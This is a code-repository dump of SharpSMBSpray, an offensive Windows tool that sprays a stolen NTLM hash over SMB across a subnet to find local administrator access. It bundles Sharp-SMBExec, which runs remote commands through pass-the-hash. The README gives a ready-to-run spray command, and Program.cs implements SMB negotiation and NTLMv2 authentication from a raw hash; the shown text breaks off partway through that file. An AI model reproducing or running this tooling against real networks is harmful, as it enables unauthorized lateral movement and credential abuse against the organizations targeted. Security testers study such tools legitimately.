Showing preview only (242K chars total). Download the full file or copy to clipboard to get everything.
Repository: rvrsh3ll/SharpSMBSpray
Branch: main
Commit: 612cbde4538a
Files: 41
Total size: 229.9 KB
Directory structure:
gitextract_suu4eg2e/
├── .gitattributes
├── .gitignore
├── LICENSE
├── README.md
├── Sharp-SMBExec/
│ ├── .gitattributes
│ ├── .gitignore
│ ├── README.md
│ ├── SharpInvoke-SMBExec/
│ │ ├── App.config
│ │ ├── ArgParse.cs
│ │ ├── Program.cs
│ │ ├── Properties/
│ │ │ └── AssemblyInfo.cs
│ │ ├── SMBExec.cs
│ │ ├── SharpInvoke-SMBExec.csproj
│ │ ├── Utilities.cs
│ │ └── packages.config
│ └── SharpInvoke-SMBExec.sln
└── SharpSMBSpray/
├── SharpSMBSpray/
│ ├── FodyWeavers.xml
│ ├── FodyWeavers.xsd
│ ├── Program.cs
│ ├── Properties/
│ │ └── AssemblyInfo.cs
│ ├── SharpSMBSpray.csproj
│ └── packages.config
├── SharpSMBSpray.sln
└── packages/
├── Costura.Fody.4.1.0/
│ ├── .signature.p7s
│ ├── Costura.Fody.4.1.0.nupkg
│ ├── build/
│ │ └── Costura.Fody.props
│ ├── lib/
│ │ └── net40/
│ │ └── Costura.xml
│ └── weaver/
│ └── Costura.Fody.xcf
├── Fody.6.0.0/
│ ├── .signature.p7s
│ ├── Fody.6.0.0.nupkg
│ ├── build/
│ │ └── Fody.targets
│ ├── netclassictask/
│ │ ├── Mono.Cecil.Pdb.pdb
│ │ ├── Mono.Cecil.Rocks.pdb
│ │ └── Mono.Cecil.pdb
│ └── netstandardtask/
│ ├── Mono.Cecil.Pdb.pdb
│ ├── Mono.Cecil.Rocks.pdb
│ └── Mono.Cecil.pdb
├── IPNetwork.1.3.2.0/
│ ├── .signature.p7s
│ └── IPNetwork.1.3.2.0.nupkg
└── NDesk.Options.0.2.1/
├── .signature.p7s
└── NDesk.Options.0.2.1.nupkg
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitattributes
================================================
# Auto detect text files and perform LF normalization
* text=auto
================================================
FILE: .gitignore
================================================
.vs
*.user
[Dd]ebug/
[Rr]elease/
[Bb]in/
[Oo]bj/
================================================
FILE: LICENSE
================================================
BSD 3-Clause License
Copyright (c) 2021, rvrsh3ll
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
================================================
FILE: README.md
================================================
# SharpSMBSpray
Spray a hash via smb to check for local administrator access
## Example
execute-assembly /home/tester/Desktop/SharpSMBSpray.exe 192.168.1.0/24 Administrator 5A31C53A49CEEF591E8961D7ACCD2847
================================================
FILE: Sharp-SMBExec/.gitattributes
================================================
###############################################################################
# Set default behavior to automatically normalize line endings.
###############################################################################
* text=auto
###############################################################################
# Set default behavior for command prompt diff.
#
# This is need for earlier builds of msysgit that does not have it on by
# default for csharp files.
# Note: This is only used by command line
###############################################################################
#*.cs diff=csharp
###############################################################################
# Set the merge driver for project and solution files
#
# Merging from the command prompt will add diff markers to the files if there
# are conflicts (Merging from VS is not affected by the settings below, in VS
# the diff markers are never inserted). Diff markers may cause the following
# file extensions to fail to load in VS. An alternative would be to treat
# these files as binary and thus will always conflict and require user
# intervention with every merge. To do so, just uncomment the entries below
###############################################################################
#*.sln merge=binary
#*.csproj merge=binary
#*.vbproj merge=binary
#*.vcxproj merge=binary
#*.vcproj merge=binary
#*.dbproj merge=binary
#*.fsproj merge=binary
#*.lsproj merge=binary
#*.wixproj merge=binary
#*.modelproj merge=binary
#*.sqlproj merge=binary
#*.wwaproj merge=binary
###############################################################################
# behavior for image files
#
# image files are treated as binary by default.
###############################################################################
#*.jpg binary
#*.png binary
#*.gif binary
###############################################################################
# diff behavior for common document formats
#
# Convert binary document formats to text before diffing them. This feature
# is only available from the command line. Turn it on by uncommenting the
# entries below.
###############################################################################
#*.doc diff=astextplain
#*.DOC diff=astextplain
#*.docx diff=astextplain
#*.DOCX diff=astextplain
#*.dot diff=astextplain
#*.DOT diff=astextplain
#*.pdf diff=astextplain
#*.PDF diff=astextplain
#*.rtf diff=astextplain
#*.RTF diff=astextplain
================================================
FILE: Sharp-SMBExec/.gitignore
================================================
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
# User-specific files
*.suo
*.user
*.userosscache
*.sln.docstates
# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs
# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
[Xx]64/
[Xx]86/
[Bb]uild/
bld/
[Bb]in/
[Oo]bj/
# Visual Studio 2015 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
# NUNIT
*.VisualState.xml
TestResult.xml
# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c
# DNX
project.lock.json
artifacts/
*_i.c
*_p.c
*_i.h
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc
# Chutzpah Test files
_Chutzpah*
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap
# TFS 2012 Local Workspace
$tf/
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user
# JustCode is a .NET coding add-in
.JustCode
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# NCrunch
_NCrunch_*
.*crunch*.local.xml
nCrunchTemp_*
# MightyMoose
*.mm.*
AutoTest.Net/
# Web workbench (sass)
.sass-cache/
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# TODO: Un-comment the next line if you do not want to checkin
# your web deploy settings because they may include unencrypted
# passwords
#*.pubxml
*.publishproj
# NuGet Packages
*.nupkg
# The packages folder can be ignored because of Package Restore
**/packages/*
# except build/, which is used as an MSBuild target.
!**/packages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/packages/repositories.config
# NuGet v3's project.json files produces more ignoreable files
*.nuget.props
*.nuget.targets
# Microsoft Azure Build Output
csx/
*.build.csdef
# Microsoft Azure Emulator
ecf/
rcf/
# Microsoft Azure ApplicationInsights config file
ApplicationInsights.config
# Windows Store app package directory
AppPackages/
BundleArtifacts/
# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!*.[Cc]ache/
# Others
ClientBin/
[Ss]tyle[Cc]op.*
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.pfx
*.publishsettings
node_modules/
orleans.codegen.cs
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
# SQL Server files
*.mdf
*.ldf
# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings
# Microsoft Fakes
FakesAssemblies/
# GhostDoc plugin setting file
*.GhostDoc.xml
# Node.js Tools for Visual Studio
.ntvs_analysis.dat
# Visual Studio 6 build log
*.plg
# Visual Studio 6 workspace options file
*.opt
# Visual Studio LightSwitch build output
**/*.HTMLClient/GeneratedArtifacts
**/*.DesktopClient/GeneratedArtifacts
**/*.DesktopClient/ModelManifest.xml
**/*.Server/GeneratedArtifacts
**/*.Server/ModelManifest.xml
_Pvt_Extensions
# LightSwitch generated files
GeneratedArtifacts/
ModelManifest.xml
# Paket dependency manager
.paket/paket.exe
# FAKE - F# Make
.fake/
================================================
FILE: Sharp-SMBExec/README.md
================================================
# Sharp-SMBExec
A native C# conversion of Kevin Robertsons Invoke-SMBExec powershell script. (https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-SMBExec.ps1)
Built for .NET 3.5
# Usage
Sharp-SMBExec.exe hash:"hash" username:"username" domain:"domain.tld" target:"target.domain.tld" command:"command"
# Description
This Assembly will allow you to execute a command on a target machine using SMB by providing an NTLM hash for the specified user.
# Help
```
Option Description
username* Username to use for authentication
hash* NTLM Password hash for authentication. This module will accept either LM:NTLM or NTLM format
domain Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username
target Hostname or IP Address of the target.
command Command to execute on the target. If a command is not specified, the function will check to see if the username and hash provide local admin access on the target
ServiceName Default = 20 Character Random. The Name of the service to create and delete on the target.
-CheckAdmin Check admin access only, don't execute command
-Help (-h) Switch, Enabled debugging [Default='False']
-Debug Print Debugging Information along with output
-ForceSMB1 Force SMB1. The default behavior is to perform SMB Version negotiation and use SMB2 if it's supported by the target [Default='False']
-ComSpec Prepend %COMSPEC% /C to Command [Default='False']
```
================================================
FILE: Sharp-SMBExec/SharpInvoke-SMBExec/App.config
================================================
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/></startup>
</configuration>
================================================
FILE: Sharp-SMBExec/SharpInvoke-SMBExec/ArgParse.cs
================================================
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace SharpInvoke_SMBExec
{
public static class ArgParse
{
//Argument parsing class from Rubeus (https://github.com/GhostPack/Rubeus/)
//Author: @Harmj0y
public static ArgumentParserResult Parse(IEnumerable<string> args)
{
var arguments = new Dictionary<string, string>();
try
{
foreach (var argument in args)
{
var idx = argument.IndexOf(':');
if (idx > 0)
arguments[argument.Substring(0, idx).ToLower()] = argument.Substring(idx + 1);
else if (argument.ToLower() == "-debug")
arguments["debugging"] = "true";
else if (argument.ToLower() == "-h")
arguments["showhelp"] = "true";
else if (argument.ToLower() == "-help")
arguments["showhelp"] = "true";
else if (argument.ToLower() == "-checkadmin")
arguments["admincheck"] = "true";
else if (argument.ToLower() == "-forcesmb1")
arguments["forcesmb1"] = "true";
else if (argument.ToLower() == "-smb1")
arguments["forcesmb1"] = "true";
else if (argument.ToLower() == "-comspec")
arguments["comspec"] = "true";
else
arguments[argument] = string.Empty;
}
return ArgumentParserResult.Success(arguments);
}
catch (System.Exception ex)
{
Console.WriteLine(ex.Message);
return ArgumentParserResult.Failure();
}
}
}
public class ArgumentParserResult
{
public bool ParsedOk { get; }
public Dictionary<string, string> Arguments { get; }
private ArgumentParserResult(bool parsedOk, Dictionary<string, string> arguments)
{
ParsedOk = parsedOk;
Arguments = arguments;
}
public static ArgumentParserResult Success(Dictionary<string, string> arguments)
=> new ArgumentParserResult(true, arguments);
public static ArgumentParserResult Failure()
=> new ArgumentParserResult(false, null);
}
}
================================================
FILE: Sharp-SMBExec/SharpInvoke-SMBExec/Program.cs
================================================
using System;
using System.Threading;
using System.Security.Cryptography;
using System.Diagnostics;
using System.Net.Sockets;
using System.Collections.Specialized;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace SharpInvoke_SMBExec
{
public class Program
{
public static void Main(string[] args)
{
string Target = args[0];
string username = args[1];
string domain = "";
string command = "";
string hash = args[2];
string ServiceName = "";
bool ForceSMB1 = false;
bool ComSpec = false;
int sleep = 15;
bool debug = false;
bool AdminCheck = true;
//Trackers
bool Login_Successful = false;
bool Service_Deleted = false;
bool SMBExec_Failed = false;
bool SMB_execute = false;
bool SMB_Signing = false;
string Output_Username;
string processID = BitConverter.ToString(BitConverter.GetBytes(Process.GetCurrentProcess().Id)).Replace("-", "");
string[] processID2 = processID.Split('-');
StringBuilder output = new StringBuilder();
int SMB2_Message_ID = 0;
int SMB_Close_Service_Handle_Stage = 0;
int SMB_Split_Stage = 0;
int SMB_Split_Index_Tracker = 0;
double SMB_Split_Stage_final = 0;
//Communication
byte[] SMBClientReceive = null;
//Packet Reqs
byte[] Process_ID_Bytes = Utilities.ConvertStringToByteArray(processID.ToString());
byte[] SMB_Session_ID = null;
byte[] Session_Key = null;
byte[] SMB_Session_Key_Length = null;
byte[] SMB_Negotiate_Flags = null;
byte[] SMB2_Tree_ID = null;
byte[] SMB_Client_Send = null;
byte[] SMB_FID = new byte[2];
byte[] SMB_Service_Manager_Context_Handle = null;
byte[] SMB_Service_Context_Handle = null;
byte[] SMB_Named_Pipe_Bytes = null;
byte[] SMB_File_ID = null;
byte[] SMB_User_ID = null;
byte[] SMB_Header = null;
byte[] SMB2_Header = null;
byte[] SMB_Data = null;
byte[] SMB2_Data = null;
byte[] NetBIOS_Session_Service = null;
byte[] NTLMSSP_Negotiate = null;
byte[] NTLMSSP_Auth = null;
byte[] SMB_Sign = null;
byte[] SMB_Signature = null;
byte[] SMB_Signature2 = null;
byte[] SMB2_Sign = null;
byte[] SMB2_Signature = null;
byte[] SMB_Signing_Sequence = null;
byte[] RPC_Data = null;
byte[] SCM_Data = null;
OrderedDictionary Packet_SMB_Header = null;
OrderedDictionary Packet_SMB2_Header = null;
OrderedDictionary Packet_SMB_Data = null;
OrderedDictionary Packet_SMB2_Data = null;
OrderedDictionary Packet_NTLMSSP_Negotiate = null;
OrderedDictionary Packet_NTLMSSP_Auth = null;
OrderedDictionary Packet_RPC_Data = null;
OrderedDictionary Packet_SCM_Data = null;
MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
Output_Username = username;
TcpClient SMBClient = new TcpClient();
SMBClient.Client.ReceiveTimeout = 60000;
try
{
SMBClient.Connect(Target, 445);
}
catch
{
//output.AppendLine("Could not connect to Target");
}
if (SMBClient.Connected)
{
if (debug) { output.AppendLine(String.Format("Connected to {0}", Target)); }
NetworkStream SMBClientStream = SMBClient.GetStream();
SMBClientReceive = new byte[1024];
string SMBClientStage = "NegotiateSMB";
while (SMBClientStage != "exit")
{
if (debug) { output.AppendLine(String.Format("Current Stage: {0}", SMBClientStage)); }
switch (SMBClientStage)
{
case "NegotiateSMB":
{
Packet_SMB_Header = new OrderedDictionary();
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x72 }, new byte[] { 0x18 }, new byte[] { 0x01, 0x48 }, new byte[] { 0xff, 0xff }, Process_ID_Bytes, new byte[] { 0x00, 0x00 });
Packet_SMB_Data = SMBExec.SMBNegotiateProtocolRequest(ForceSMB1);
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
if (BitConverter.ToString(new byte[] { SMBClientReceive[4], SMBClientReceive[5], SMBClientReceive[6], SMBClientReceive[7] }).ToLower() == "ff-53-4d-42")
{
ForceSMB1 = true;
if (debug) { output.AppendLine("Using SMB1"); }
SMBClientStage = "NTLMSSPNegotiate";
if (BitConverter.ToString(new byte[] { SMBClientReceive[39] }).ToLower() == "0f")
{
if (debug) { output.AppendLine("SMB Signing is Enabled"); }
SMB_Signing = true;
SMB_Session_Key_Length = new byte[] { 0x00, 0x00 };
SMB_Negotiate_Flags = new byte[] { 0x15, 0x82, 0x08, 0xa0 };
}
else
{
if (debug) { output.AppendLine("SMB Signing is not Enforced"); }
SMB_Signing = false;
SMB_Session_Key_Length = new byte[] { 0x00, 0x00 };
SMB_Negotiate_Flags = new byte[] { 0x05, 0x82, 0x08, 0xa0 };
}
}
else
{
if (debug) { output.AppendLine("Using SMB2"); }
SMBClientStage = "NegotiateSMB2";
if (BitConverter.ToString(new byte[] { SMBClientReceive[70] }) == "03")
{
if (debug) { output.AppendLine("SMB Signing is Enabled"); }
SMB_Signing = true;
SMB_Session_Key_Length = new byte[] { 0x00, 0x00 };
SMB_Negotiate_Flags = new byte[] { 0x15, 0x82, 0x08, 0xa0 };
}
else
{
if (debug) { output.AppendLine("SMB Signing is not Enforced"); }
SMB_Signing = false;
SMB_Session_Key_Length = new byte[] { 0x00, 0x00 };
SMB_Negotiate_Flags = new byte[] { 0x05, 0x80, 0x08, 0xa0 };
}
}
}
break;
case "NegotiateSMB2":
{
SMB2_Message_ID = 1;
Packet_SMB2_Header = new OrderedDictionary();
SMB2_Tree_ID = new byte[] { 0x00, 0x00, 0x00, 0x00 };
SMB_Session_ID = new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x00, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_SMB2_Data = SMBExec.SMB2NegotiateProtocolRequest();
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "NTLMSSPNegotiate";
}
break;
case "NTLMSSPNegotiate":
{
SMB_Client_Send = null;
if (ForceSMB1)
{
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x73 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, new byte[] { 0xff, 0xff }, Process_ID_Bytes, new byte[] { 0x00, 0x00 });
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
}
Packet_NTLMSSP_Negotiate = SMBExec.NTLMSSPNegotiate(SMB_Negotiate_Flags, null);
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
NTLMSSP_Negotiate = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Negotiate);
Packet_SMB_Data = SMBExec.SMBSessionSetupAndXRequest(NTLMSSP_Negotiate);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
}
else
{
Packet_SMB2_Header = new OrderedDictionary();
SMB2_Message_ID += 1;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x01, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_NTLMSSP_Negotiate = SMBExec.NTLMSSPNegotiate(SMB_Negotiate_Flags, null);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
NTLMSSP_Negotiate = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Negotiate);
Packet_SMB2_Data = SMBExec.SMB2SessionSetupRequest(NTLMSSP_Negotiate);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
}
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
SMBClientStage = "exit";
}
break;
}
}
if (debug) { output.AppendLine(String.Format("Authenticating to {0}", Target)); }
string SMB_NTLSSP = BitConverter.ToString(SMBClientReceive);
SMB_NTLSSP = SMB_NTLSSP.Replace("-", "");
int SMB_NTLMSSP_Index = SMB_NTLSSP.IndexOf("4E544C4D53535000");
int SMB_NTLMSSP_Bytes_Index = SMB_NTLMSSP_Index / 2;
int SMB_Domain_Length = Utilities.DataLength(SMB_NTLMSSP_Bytes_Index + 12, SMBClientReceive);
int SMB_Target_Length = Utilities.DataLength(SMB_NTLMSSP_Bytes_Index + 40, SMBClientReceive);
SMB_Session_ID = Utilities.GetByteRange(SMBClientReceive, 44, 51);
byte[] SMB_NTLM_challenge = Utilities.GetByteRange(SMBClientReceive, SMB_NTLMSSP_Bytes_Index + 24, SMB_NTLMSSP_Bytes_Index + 31);
byte[] SMB_Target_Details = null;
SMB_Target_Details = Utilities.GetByteRange(SMBClientReceive, (SMB_NTLMSSP_Bytes_Index + 56 + SMB_Domain_Length), (SMB_NTLMSSP_Bytes_Index + 55 + SMB_Domain_Length + SMB_Target_Length));
byte[] SMB_Target_Time_Bytes = Utilities.GetByteRange(SMB_Target_Details, SMB_Target_Details.Length - 12, SMB_Target_Details.Length - 5);
string hash2 = "";
for (int i = 0; i < hash.Length - 1; i += 2) { hash2 += (hash.Substring(i, 2) + "-"); };
byte[] NTLM_hash_bytes = (Utilities.ConvertStringToByteArray(hash.Replace("-", "")));
string Auth_Hostname = Environment.MachineName;
byte[] Auth_Hostname_Bytes = Encoding.Unicode.GetBytes(Auth_Hostname);
byte[] Auth_Domain_Bytes = Encoding.Unicode.GetBytes(domain);
byte[] Auth_Username_Bytes = Encoding.Unicode.GetBytes(username);
byte[] Auth_Domain_Length = BitConverter.GetBytes(Auth_Domain_Bytes.Length);
Auth_Domain_Length = new byte[] { Auth_Domain_Length[0], Auth_Domain_Length[1] };
byte[] Auth_Username_Length = BitConverter.GetBytes(Auth_Username_Bytes.Length);
Auth_Username_Length = new byte[] { Auth_Username_Length[0], Auth_Username_Length[1] };
byte[] Auth_Hostname_Length = BitConverter.GetBytes(Auth_Hostname_Bytes.Length);
Auth_Hostname_Length = new byte[] { Auth_Hostname_Length[0], Auth_Hostname_Length[1] };
byte[] Auth_Domain_offset = new byte[] { 0x40, 0x00, 0x00, 0x00 };
byte[] Auth_Username_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + 64);
byte[] Auth_Hostname_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + 64);
byte[] Auth_LM_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + 64);
byte[] Auth_NTLM_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + 88);
HMACMD5 HMAC_MD5 = new HMACMD5();
HMAC_MD5.Key = NTLM_hash_bytes;
string Username_And_Target = username.ToUpper();
byte[] Username_Bytes = Encoding.Unicode.GetBytes(Username_And_Target);
byte[] Username_And_Target_bytes = Username_Bytes.Concat(Auth_Domain_Bytes).ToArray();
byte[] NTLMv2_hash = HMAC_MD5.ComputeHash(Username_And_Target_bytes);
Random r = new Random();
byte[] Client_Challenge_Bytes = new byte[8];
r.NextBytes(Client_Challenge_Bytes);
byte[] Security_Blob_Bytes = (new byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
.Concat(SMB_Target_Time_Bytes)
.Concat(Client_Challenge_Bytes)
.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 })
.Concat(SMB_Target_Details)
.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray();
byte[] Server_Challenge_And_Security_Blob_Bytes = Server_Challenge_And_Security_Blob_Bytes = SMB_NTLM_challenge.Concat(Security_Blob_Bytes).ToArray();
HMAC_MD5.Key = NTLMv2_hash;
byte[] NTLMv2_Response = HMAC_MD5.ComputeHash(Server_Challenge_And_Security_Blob_Bytes);
if (SMB_Signing)
{
byte[] Session_Base_Key = HMAC_MD5.ComputeHash(NTLMv2_Response);
Session_Key = Session_Base_Key;
HMACSHA256 HMAC_SHA256 = new HMACSHA256();
HMAC_SHA256.Key = Session_Key;
}
NTLMv2_Response = NTLMv2_Response.Concat(Security_Blob_Bytes).ToArray();
byte[] NTLMv2_Response_Length = BitConverter.GetBytes(NTLMv2_Response.Length);
NTLMv2_Response_Length = new byte[] { NTLMv2_Response_Length[0], NTLMv2_Response_Length[1] };
byte[] SMB_Session_Key_offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + NTLMv2_Response.Length + 88);
byte[] NTLMSSP_response = (new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x18, 0x00, 0x18, 0x00 })
.Concat(Auth_LM_Offset)
.Concat(NTLMv2_Response_Length)
.Concat(NTLMv2_Response_Length)
.Concat(Auth_NTLM_Offset)
.Concat(Auth_Domain_Length)
.Concat(Auth_Domain_Length)
.Concat(Auth_Domain_offset)
.Concat(Auth_Username_Length)
.Concat(Auth_Username_Length)
.Concat(Auth_Username_Offset)
.Concat(Auth_Hostname_Length)
.Concat(Auth_Hostname_Length)
.Concat(Auth_Hostname_Offset)
.Concat(SMB_Session_Key_Length)
.Concat(SMB_Session_Key_Length)
.Concat(SMB_Session_Key_offset)
.Concat(SMB_Negotiate_Flags)
.Concat(Auth_Domain_Bytes)
.Concat(Auth_Username_Bytes)
.Concat(Auth_Hostname_Bytes)
.Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 })
.Concat(NTLMv2_Response).ToArray();
if (ForceSMB1)
{
Packet_SMB_Header = new OrderedDictionary();
SMB_User_ID = new byte[] { SMBClientReceive[32], SMBClientReceive[33] };
Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x73 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, new byte[] { 0xff, 0xff }, Process_ID_Bytes, new byte[] { 0x00, 0x00 });
if (SMB_Signing)
{
Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
}
Packet_SMB_Header["SMBHeader_UserID"] = SMB_User_ID;
Packet_NTLMSSP_Negotiate = SMBExec.NTLMSSPAuth(NTLMSSP_response);
SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
NTLMSSP_Negotiate = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Negotiate);
Packet_SMB_Data = SMBExec.SMBSessionSetupAndXRequest(NTLMSSP_Negotiate);
SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
}
else
{
SMB2_Message_ID += 1;
Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x01, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
Packet_NTLMSSP_Auth = SMBExec.NTLMSSPAuth(NTLMSSP_response);
SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
NTLMSSP_Auth = Utilities.ConvertFromPacketOrderedDictionary(Packet_NTLMSSP_Auth);
Packet_SMB2_Data = SMBExec.SMB2SessionSetupRequest(NTLMSSP_Auth);
SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
}
SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
if (ForceSMB1)
{
if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 9, 12)) == "00-00-00-00")
{
if (debug) { output.AppendLine("Authentication Successful"); }
Login_Successful = true;
}
else
{
output.AppendLine("Unable to authenticate to Target.");
Console.WriteLine(output.ToString());
}
}
else
{
if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 12, 15)) == "00-00-00-00")
{
if (debug) { output.AppendLine("Authentication Successful"); }
Login_Successful = true;
}
else
{
